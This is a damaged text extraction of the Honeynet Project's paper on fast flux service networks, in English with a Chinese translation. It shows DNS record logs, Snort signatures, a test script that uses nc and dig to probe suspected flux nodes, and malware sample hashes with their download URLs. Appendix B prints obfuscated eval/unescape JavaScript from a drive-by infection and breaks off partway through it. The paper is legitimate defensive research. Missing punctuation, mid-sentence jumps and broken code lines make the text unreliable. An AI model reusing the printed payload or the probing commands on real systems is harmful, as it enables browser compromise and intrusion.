Networks中文翻譯.pdf

KYE Fast Flux Service Networks 中文翻譯 翻譯 廖建華 校稿 諸葛建偉 Know Your Enemy 了解你的敵人 Fast Flux Service Networks Fast Flux 服務(wù)網(wǎng)絡(luò) An Ever Changing Enemy 永遠處于變化中的敵人 The Honeynet Project WHEN Sat Feb 3 20 08 08 2007 divewithsharks hk 1800 IN A 70 68 187 xxx divewithsharks hk 1800 IN A 76 209 81 xxx SBIS AS AT WHEN Sat Feb 3 20 40 04 2007 30 minutes 1800 seconds later divewithsharks hk 1800 IN A 24 85 102 xxx divewithsharks hk 1800 IN A 24 85 102 xxx NEWNEW divewithsharks hk 1800 IN A 69 47 177 xxx d47 69 xxx divewithsharks hk 1800 IN A 69 47 177 xxx d47 69 xxx NEWNEW divewithsharks hk 1800 IN A 70 68 187 xxx divewithsharks hk 1800 IN A 90 144 43 xxx d90 144 43 xxx cust tele2 fr divewithsharks hk 1800 IN A 142 165 41 xxx 142 165 41 xxx msjw hsdb sasknet sk ca KYE Fast Flux Service Networks 中文翻譯 翻譯 廖建華 校稿 諸葛建偉 divewithsharks hk 1800 IN NS ns1 world divewithsharks hk 1800 IN NS ns2 world ns1 world 85248 IN A 66 232 119 xxx HVC AS HIVELOCITY VENTURES CORP ns2 world 82991 IN A 209 88 199 xxx vpdn dsl209 88 199 As we see highlighted in bold two of the advertised IP addresses have changed Again these two IP addresses belong to dial up or broadband networks Another 30 minutes later a lookup of the domain returns the following information 我們可以看到 用黑體突出顯示的兩條記錄的 IP 地址改變了 還有 這兩個 IP 地址屬于撥號或者寬帶網(wǎng)絡(luò) 又一個 30 分鐘后 對該域名的解析返回如下信息 WHEN Sat Feb 3 21 10 07 2007 30 minutes 1800 seconds later divewithsharks hk 1238 IN A 68 150 25 xxx divewithsharks hk 1238 IN A 68 150 25 xxx NEWNEW divewithsharks hk 1238 IN A 76 209 81 xxx SBIS AS AT WHEN Wed Apr 4 18 47 50 2007 177 IN A 66 229 133 xxx c 66 229 133 177 IN A 67 10 117 xxx cpe 67 10 117 177 IN A 70 244 2 xxx adsl 70 244 2 177 IN A 74 67 113 xxx cpe 74 67 113 177 IN A 74 137 49 xxx 74 137 49 108877 IN NS ns3 myheroisyourslove hk 108877 IN NS ns4 myheroisyourslove hk 108877 IN NS ns5 myheroisyourslove hk 108877 IN NS ns1 myheroisyourslove hk 108877 IN NS ns2 myheroisyourslove hk ns1 myheroisyourslove hk 854 IN A 70 227 218 xxx ppp 70 227 218 ns2 myheroisyourslove hk 854 IN A 70 136 16 xxx adsl 70 136 16 ns3 myheroisyourslove hk 854 IN A 68 59 76 xxx c 68 59 76 ns4 myheroisyourslove hk 854 IN A 70 126 19 xxx xxx 19 126 ns5 myheroisyourslove hk 854 IN A 70 121 157 xxx About 4 minutes later for the same domain only the A records have changed Notice that the NS records have remained the same KYE Fast Flux Service Networks 中文翻譯 翻譯 廖建華 校稿 諸葛建偉 大約 4 分鐘后 對于相同的域名 只有 A 記錄發(fā)生了變化 NS 記錄和原來一樣沒有改變 WHEN Wed Apr 4 18 51 56 2007 4 minutes 186 seconds later 161 IN A 74 131 218 xxx 74 131 218 161 IN A 74 131 218 xxx 74 131 218 NEWNEW 161 IN A 24 174 195 xxx cpe 24 174 195 161 IN A 24 174 195 xxx cpe 24 174 195 NEWNEW 161 IN A 65 65 182 xxx adsl 65 65 182 161 IN A 65 65 182 xxx adsl 65 65 182 NEWNEW 161 IN A 69 215 174 xxx ppp 69 215 174 161 IN A 69 215 174 xxx ppp 69 215 174 NEWNEW 161 IN A 71 135 180 xxx adsl 71 135 180 161 IN A 71 135 180 xxx adsl 71 135 180 NEWNEW 108642 IN NS ns3 myheroisyourslove hk 108642 IN NS ns4 myheroisyourslove hk 108642 IN NS ns5 myheroisyourslove hk 108642 IN NS ns1 myheroisyourslove hk 108642 IN NS ns2 myheroisyourslove hk ns1 myheroisyourslove hk 608 IN A 70 227 218 xxx ppp 70 227 218 ns2 myheroisyourslove hk 608 IN A 70 136 16 xxx adsl 70 136 16 ns3 myheroisyourslove hk 608 IN A 68 59 76 xxx c 68 59 76 ns4 myheroisyourslove hk 608 IN A 70 126 19 xxx xxx 19 126 Ns5 myheroisyourslove hk 608 IN A 70 121 157 xxx Checking again one and a half hours later the NS records for this domain have migrated and five new NS records appear Similar to the previous example we see that the A and NS record are hosted at dial up or broadband providers indicating that these are compromised hosts used by an attacker for nefarious purposes 一個半小時后再查看 DNS 記錄 發(fā)現(xiàn)針對這個域名的 NS 記錄改變了并出現(xiàn)了 5 條新的 NS 記錄 和前面的實例相同 我們 看到 A 和 NS 記錄所指向撥號上網(wǎng)或者寬帶主機 說明這些被控制的主機被攻擊者用于非法的目的 WHEN Wed Apr 4 21 13 14 2007 90 minutes 4878 seconds later ns1 myheroisyourslove hk 3596 IN A 75 67 15 xxx c 75 67 15 ns1 myheroisyourslove hk 3596 IN A 75 67 15 xxx c 75 67 15 NEWNEW ns2 myheroisyourslove hk 3596 IN A 75 22 239 xxx adsl 75 22 239 ns2 myheroisyourslove hk 3596 IN A 75 22 239 xxx adsl 75 22 239 NEWNEW ns3 myheroisyourslove hk 3596 IN A 75 33 248 xxx adsl 75 33 248 ns3 myheroisyourslove hk 3596 IN A 75 33 248 xxx adsl 75 33 248 NEWNEW ns4 myheroisyourslove hk 180 IN A 69 238 210 xxx ppp 69 238 210 ns4 myheroisyourslove hk 180 IN A 69 238 210 xxx ppp 69 238 210 NEWNEW ns5 myheroisyourslove hk 3596 IN A 70 64 222 xxx ns5 myheroisyourslove hk 3596 IN A 70 64 222 xxx NEWNEW FAST FLUX MALWARE Flux node agents share the most essential and basic capabilities of the traditional but minimalist IRC based bot in several ways they regularly phone home to announce their continued availability they check for updates perform download operations and allow for the execution of arbitrary commands on the local operating system by a remote attacker However almost without exception fast flux Command and Control C flow established to server content aGVsbG9mbHV4IAo offset 0 depth 15 priority 1 classtype trojan activity sid 5005111 rev 1 KYE Fast Flux Service Networks 中文翻譯 翻譯 廖建華 校稿 諸葛建偉 alert udp HOME NET 1024 65535 HOME NET 53 msg FluxDNS Upstream DST content 00 02 01 00 00 01 offset 0 depth 6 content aGVsbG9mbHV4IAo within 20 priority 1 classtype trojan activity sid 5005112 rev 1 The following simple shell scripts injects the Base64 encoded string helloflux aGVsbG9mbHV4IAo one for a HTTP request and then another for a DNS request With the help of the Snort signatures from above we can then trace the path of the strings through the network 下面簡單 shell 腳本通過 HTTP 請求注入 Base64 編碼的字符串 helloflux aGVsbG9mbHV4IAo 另外一個是利用 DNS 請求注入 利用上面 Snort 特征碼檢測的幫助 我們可以追蹤字符串經(jīng)過網(wǎng)絡(luò)的路徑 echo fluxtest sh bin bash Simple shell script to test suspected flux nodes on your managed networks echo aGVsbG9mbHV4IAo nc w 1 1 80 dig time 1 aGVsbG9mbHV4IA 1 If a service provider lacks IDS capability in the user space yet has the capability to report on NetFlow this mechanism can also be used to detect fast flux service networks This is not as good as the IDS based detection method presented above but looking for TCP 80 and or UDP 53 into user IP space is a start This kind of traffic should normally not occur and is thus a sign of a possible flux agent The following listing provides some further ideas to stop this kind of threat In brackets we list which party could implement such mitigation policies 1 Establish policies to enable blocking of TCP 80 and UDP 53 into user land networks if possible ISP 2 Block access to controller infrastructure motherships registration and availability checkers as they are discovered ISP 3 Improving domain registrar response procedures and auditing new registrations for likely fraudulent purpose Registrar 4 Increase service provider awareness foster understanding of the threat shared processes and knowledge ISP 5 Blackhole DNS and BGP route injection to kill related motherships and management infrastructure ISP 6 Passive DNS harvesting monitoring to identify A or NS records advertised into publicly routable user IP space ISPs Registrars Security professionals This is just a very brief overview of how fast flux service networks can be mitigated and further research is required in this subject area 如果一個服務(wù)提供商沒有給用戶提供 IDS 能力 但是可以有能力提供 NetFlow 報告 這種機制也可以用于探測 fast flux 服務(wù)網(wǎng)絡(luò) 這種方法不如上面提到的基于 IDS 的檢測方法有效 而這種方法的開端是在用戶 IP 控件查找 TCP80 和 或者 UDP53 這種特征的流量不是經(jīng)常發(fā)生因此可以作為有可能是 flux 代理的一個標(biāo)志 下面的列表提供一些制止這種威脅的進一步的想 法 在括號中 我們列出了哪些部門可以實現(xiàn)這樣的減災(zāi)策略 1 如果有可能建立阻斷 TCP 80 和 UDP 53 流量進入用戶網(wǎng)絡(luò)的策略 ISP 2 阻斷已發(fā)現(xiàn)的控制器的訪問 ISP 3 提高域名注冊發(fā)應(yīng)過程 加強有可能以欺騙為目的的新域名注冊的審計 Registrar 4 增強服務(wù)提供商的意識 加強對威脅的理解 共享相關(guān)方法和知識 ISP 5 DNS 黑洞和 BGP 路由注入清除相關(guān) motherships 節(jié)點和管理設(shè)施 ISP 6 被動 DNS 監(jiān)視識別 A 或者 NS 記錄指向公共可路由的 IP 空間 ISPs 域名注冊機構(gòu) 安全專家 這只是應(yīng)對 fast flux 服務(wù)網(wǎng)絡(luò)危害的簡單概述 在這個領(lǐng)域還需要進一步的研究 KYE Fast Flux Service Networks 中文翻譯 翻譯 廖建華 校稿 諸葛建偉 SUMMARY Fast flux service networks demonstrate an evolutionary step for online crime operations Fast flux service networks create robust obfuscating service delivery infrastructures that make it difficult for system administrators and law enforcement agents to shut down active scams and identify the criminals operating them The robustness obfuscation capabilities scalability and increased availability of fast flux service produce an increased Return on Investment ROI for the criminals who operate them Just as in legitimate business the Internet represents a huge economic business model for online crime which unfortunately means that we can expect techniques such as fast flux service networks to continue to evolve Often emerging threats such as fast flux service networks are a step ahead of security professionals and it looks likely that this particular arms race will continue into the foreseeable future 總結(jié)總結(jié) fast flux 服務(wù)網(wǎng)絡(luò)顯示了在線網(wǎng)絡(luò)犯罪的發(fā)展進程 fast flux 服務(wù)網(wǎng)絡(luò)創(chuàng)建了健壯的具有迷惑性的傳輸基礎(chǔ)設(shè)施 使 系統(tǒng)管理員和法律執(zhí)行部門更加難以關(guān)閉活躍的犯罪網(wǎng)絡(luò)和追蹤識別犯罪者 fast flux 服務(wù)網(wǎng)絡(luò)的健壯性 混淆能力 擴展 性和可用性提高了犯罪者的投資回報 互聯(lián)網(wǎng)對于合法經(jīng)營來說是一個巨大的經(jīng)濟商業(yè)模式 對于在線犯罪來說也是如此 很 不幸 我們可預(yù)期的技術(shù)像 fast flux 服務(wù)網(wǎng)絡(luò)還在不停地發(fā)展 經(jīng)常出現(xiàn)的安全威脅就像 fast flux 服務(wù)網(wǎng)絡(luò)總是比安全專 家快一步 看起來這樣的攻防博弈將持續(xù)到可預(yù)見的未來 ACKNOWLEDGEMENTS A paper of this complexity requires the input and cooperation from many people and organizations In particular the Honeynet Project would like to thank the following people The SANS Internet Storm Center Multiple service provider networks David Watson of the UK Honeynet Project reviewer Thorsten Holz of the German Honeynet Project reviewer Fyodor of the Honeynet Project reviewer David Dittrich of the Honeynet Project reviewer Jamie Riden of the UK Honeynet Project reviewer Earl Sammons of the Honeynet Project reviewer Georg Wicherski of the German Honeynet Project reviewer Nico Fischbach of the French Honeynet Project reviewer Christian Seifert of the NZ Honeynet Project reviewer Christine Kilger design artist 致謝致謝 這樣復(fù)雜的一篇文章需要很多個人和組織的參與和合作 特別地 蜜網(wǎng)項目組想感謝下列人士 The SANS Internet Storm Center Multiple service provider networks David Watson of the UK Honeynet Project 審稿人 Thorsten Holz of the German Honeynet Project 審稿人 Fyodor of the Honeynet Project 審稿人 David Dittrich of the Honeynet Project 審稿人 KYE Fast Flux Service Networks 中文翻譯 翻譯 廖建華 校稿 諸葛建偉 Jamie Riden of the UK Honeynet Project 審稿人 Earl Sammons of the Honeynet Project 審稿人 Georg Wicherski of the German Honeynet Project 審稿人 Nico Fischbach of the French Honeynet Project 審稿人 Christian Seifert of the NZ Honeynet Project 審稿人 Christine Kilger design artist APPENDIX A Fast Flux Proxy Samples There have been noticeable advancements the flux agent presented in this document over the past year including the migration away from arbitrary TCP connections to obtain clear text instructions using an HTTP library to obtain downloaded instructions settings and binary updates and finally the most recent variants that receive control settings via encoded update files The following examples demonstrates a short historical timeline of just one fast flux service network malware variant responsible for all double flux service networks referenced in this research It is worth noting that we have observed evidence supporting five distinct fast flux service nets in operation on the Internet but have not acquired malware samples for all variants to support in depth study 附錄A Fast Flux 代理代理 Samples 在文中提到的flux代理在過去的一年中有明顯的進步 包括從任意TCP連接中遷移可以獲得清晰的文本格式的指令 利用HTTP庫獲得下載的指令 設(shè)置信息和二進制的升級包 最近的大多數(shù)變種通過編譯好的升級文件獲得控制設(shè)置 下面的樣本顯示fast flux服務(wù)網(wǎng)絡(luò)惡意軟件的變種歷史 這些變 種可以適用于本文提到的所有double flux服務(wù)網(wǎng)絡(luò) 值得注意的是我們已經(jīng)發(fā)現(xiàn)其支持五個不同fast flux服務(wù)網(wǎng)絡(luò)運行的證據(jù) 但是沒有獲得各種變種 惡意代碼樣本以支持更深一步的研究 Sample 5cbef2780c8b59977ae598775bad8ecb weby exe File type s MS DOS executable EXE OS 2 or MS Windows Size 51200 Bytes Access 2007 04 02 22 34 03 000000000 0400 Modify 2007 04 02 22 30 36 000000000 0400 Change 2007 04 02 22 34 03 000000000 0400 MD5 5cbef2780c8b59977ae598775bad8ecb SHA1 0925a54ba0366a6406d3222e65b03df0ea8cbc11 Source s of sample Timestamps are YYYY MM DD hh mm ss EDT 0400 2007 04 02 22 32 27 5cbef2780c8b59977ae598775bad8ecb http xxx myexes hk exes weby exe Sample 70978572bc5c4fecb9d759611b27a762 weby exe File type s MS DOS executable EXE OS 2 or MS Windows Size 50176 Bytes KYE Fast Flux Service Networks 中文翻譯 翻譯 廖建華 校稿 諸葛建偉 Access 2007 03 15 02 09 03 000000000 0400 Modify 2007 03 09 10 51 26 000000000 0500 Change 2007 03 15 02 09 03 000000000 0400 MD5 70978572bc5c4fecb9d759611b27a762 SHA1 f8a4d881257dc2f2b2c17ee43f60144e6615994d Source s of sample Timestamps are YYYY MM DD hh mm ss EDT 0400 2007 03 15 02 06 43 70978572bc5c4fecb9d759611b27a762 http xxx myexes hk exes webdlx weby exe Sample 5870fd7119a91323dbdf04ebd07d0ac7 plugin ddos dll File type s MS DOS executable EXE OS 2 or MS Windows Size 9728 Bytes Access 2007 04 02 15 39 05 000000000 0400 Modify 2007 03 09 23 48 17 000000000 0500 Change 2007 04 02 15 39 06 000000000 0400 MD5 5870fd7119a91323dbdf04ebd07d0ac7 SHA1 4c4d1b3e2030e9a8f3b5c8f152ef9ac7590a96ca Source s of sample Timestamps are YYYY MM DD hh mm ss EDT 0400 2007 04 02 15 36 55 5870fd7119a91323dbdf04ebd07d0ac7 http 65 111 176 xxx weby plugin ddos dll Previous incarnation Sample e903534fab14ee7e00c279d64f578cbb webyx exe File type s MS DOS executable EXE Size 29557 Bytes Access 2007 02 06 15 26 03 000000000 0500 Modify 2007 02 02 08 47 24 000000000 0500 Change 2007 02 06 15 26 03 000000000 0500 MD5 e903534fab14ee7e00c279d64f578cbb SHA1 cf8279c35ec7d8914f3a4ccaaa71e14e7a925b93 Source s of sample Timestamps are YYYY MM DD hh mm ss EST 0500 2007 02 06 15 20 55 e903534fab14ee7e00c279d64f578cbb http xxx myfiles hk exes webyx exe Even older sample 甚至更老的樣本 Sample 88b58b62ae43f0fa42e852874aefbd01 weby exe KYE Fast Flux Service Networks 中文翻譯 翻譯 廖建華 校稿 諸葛建偉 File type s MS DOS executable EXE Size 29425 Bytes Access 2007 01 20 16 29 06 000000000 0500 Modify 2007 01 20 05 39 22 000000000 0500 Change 2007 01 20 16 29 06 000000000 0500 MD5 88b58b62ae43f0fa42e852874aefbd01 SHA1 6a22e1a06ced848da220301ab85be7a33867bfb5 Source s of sample Timestamps are YYYY MM DD hh mm ss EST 0500 2007 01 20 16 26 12 88b58b62ae43f0fa42e852874aefbd01 http xxx myexes hk exes weby exe A prehistoric sample of flux agent code according to Internet time We first observed nodes infected with this malware in the middle of 2006 but only acquired a malware sample for analysis in November 2006 一個歷史上 互聯(lián)網(wǎng)時間 著名的flux代理樣本 我們在2006年中第一次發(fā)現(xiàn)感染這種惡意代碼的節(jié)點 但是只在2006年11月獲得一個惡意代碼樣本 用于分析 Sample d134894005c299c1c01e63d9012a12c6 CD373B130D74F24CA5F8F1ADECA0F6856BC6072Adnssvc exe File type s MS DOS executable EXE OS 2 or MS Windows Size 11264 Bytes Access 2006 11 14 06 39 03 000000000 0500 Modify 2006 11 14 06 29 14 000000000 0500 Change 2006 11 14 06 39 03 000000000 0500 MD5 d134894005c299c1c01e63d9012a12c6 SHA1 cd373b130d74f24ca5f8f1adeca0f6856bc6072a Source s of sample Timestamps are YYYY MM DD hh mm ss EST 0500 2006 11 14 06 29 44 d134894005c299c1c01e63d9012a12c6 CD373B130D74F24CA5F8F1ADE APPENDIX B THE INFECTION PROCESS Having discussed fast flux techniques different fast flux service network classifications and the malware typically involved let s see how the malware distribution process usually works If you have extensive experience with malware and its infection process you may wish to skip this part This is a real world example of a MySpace drive by phish attack vector propagating fast flux service network growth a drive by attack occurs when a victim is exploited through their web browser email client or OS bug without user intervention In this example we identify two infection vectors 1 Compromised MySpace Member profiles redirecting to drive by phish 2 SWF Flash image malicious redirection to drive by phish We start with profile redirection in MySpace member profiles using iframes Notice in this example just how many times iframes are called often simply redirecting to another iframe an iframe or inline frame is an HTML element which makes it possible to embed another HTML document inside the main document Also note the heavy use of obfuscated JavaScript The attack begins when a connection is made to the domain 附錄 B KYE Fast Flux Service Networks 中文翻譯 翻譯 廖建華 校稿 諸葛建偉 傳染過程傳染過程 已經(jīng)討論了fast flux技術(shù) 不同的fast flux服務(wù)網(wǎng)絡(luò)分類和涉及的典型的相關(guān)惡意軟件 讓我們看看惡意軟件的分布過程通常是怎樣進行的 如果 你對惡意軟件和它的傳染過程有比較豐富的經(jīng)驗的話 你可以跳過這個部分 這是一個現(xiàn)實世界中的實例 MySpace站點遭drive by phish攻擊加速了 fast flux服務(wù)網(wǎng)絡(luò)的生長 所謂drive by攻擊就是在沒有用戶干預(yù)的情況下 受害主機通過它們的瀏覽器 電子郵件客戶端或者操作系統(tǒng)漏洞而被控制 在這里我們發(fā)現(xiàn)兩種病毒載體 1 利用受控主機MySpace的用戶屬性文件進行drive by phish攻擊 2 在Flash文件中嵌入惡意代碼進行drive by phish攻擊 我們利用iframes在MySpace用戶屬性中進行重定向 注意到在這個例子中有多少次iframe調(diào)用只是簡單的重定向到另一個iframe iframe或者內(nèi)聯(lián) iframe是嵌入另外一個HTML文件到主文檔的HTML元素 也注意到大量使用的具有迷惑性的JavaScript 當(dāng)建立起一個到 的連接時攻擊就開始了 GET By following the above da3e index php link we end up going to a credible looking MySpace landing page served by a fast flux node with the most interesting footer element displayed below 通過追蹤上面的 da3e index php 鏈接 我們放棄了去一個可信的看起來像MySpace的登錄頁面 由fast flux節(jié)點提供 這個登錄頁面包括最有趣的 頁腳元素 顯示如下 window status Done The iframe rendered footer 01 gif which is not an actual gif file but instead an encoded obfuscated JavaScript snippet Below we can see the obfuscated JavaScript code it feeds us Iframe返回 footer 01 gif 這不是一個真正的gif文件 而是一個經(jīng)過編譯的具有迷惑性的JavaScript片斷 下面我們可以看到返回給我們的具有迷惑 性的JavaScript代碼 eval unescape 66 75 6E 63 74 69 6F 6E 20 64 28 73 29 7B 72 3D 6E 65 77 20 41 72 72 61 79 28 29 3B 74 3D 22 22 3B 6A 3D 30 3B 66 6F 72 28 69 3D 73 2E 6C 65 6E 67 74 68 2D 31 3B 69 3E 30 3B 69 2D 2D 29 7B 74 2B 3 D 53 74 72 69 6E 67 2E 66 72 6F 6D 43 68 61 72 43 6F 64 65 28 73 2E 63 68 61 72 43 6F 64 65 41 74 28 69 29 5E 32 29 3B 69 66 28 74 2E 6C 65 6E 67 74 68 3E 38 30 29 7B 72 5B 6A 2B 2B 5D 3D 74 3B 74 3D 22 22 7D 7D 64 6F 63 75 6D 65 6E 74 2E 77 72 69 74 65 28 72 2E 6A 6F 69 6E 28 22 22 29 2B 74 29 7D d unescape 08 glmF qwvcvq umflku eval unescape 66 75 6E 63 74 69 6F 6E 20 64 28 73 29 7B 72 3D 6E 65 77 20 41 72 72 61 79 28 29 3B 74 3D 22 22 3B 6A 3D 30 3B 66 6F 72 28 69 3D 73 2E 6C 65 6E 67 74 68 2D 31 3B 69 3E 30 3B 69 2D 2D 29 7B 74 2B 3 D 53 74 72 69 6E 67 2E 66 72 6F 6D 43 68 61 72 43 6F 64 65 28 73 2E 63 68 61 72 43 6F 64 65 41 74 28 69 29 5E 32 29 3B 69 66 28 74 2E 6C 65 6E 67 74 68 3E 38 30 29 7B 72 5B 6A 2B 2B 5D 3D 74 3B 74 3D 22 22 7D 7D 64 6F 63 75 6D 65 6E 74 2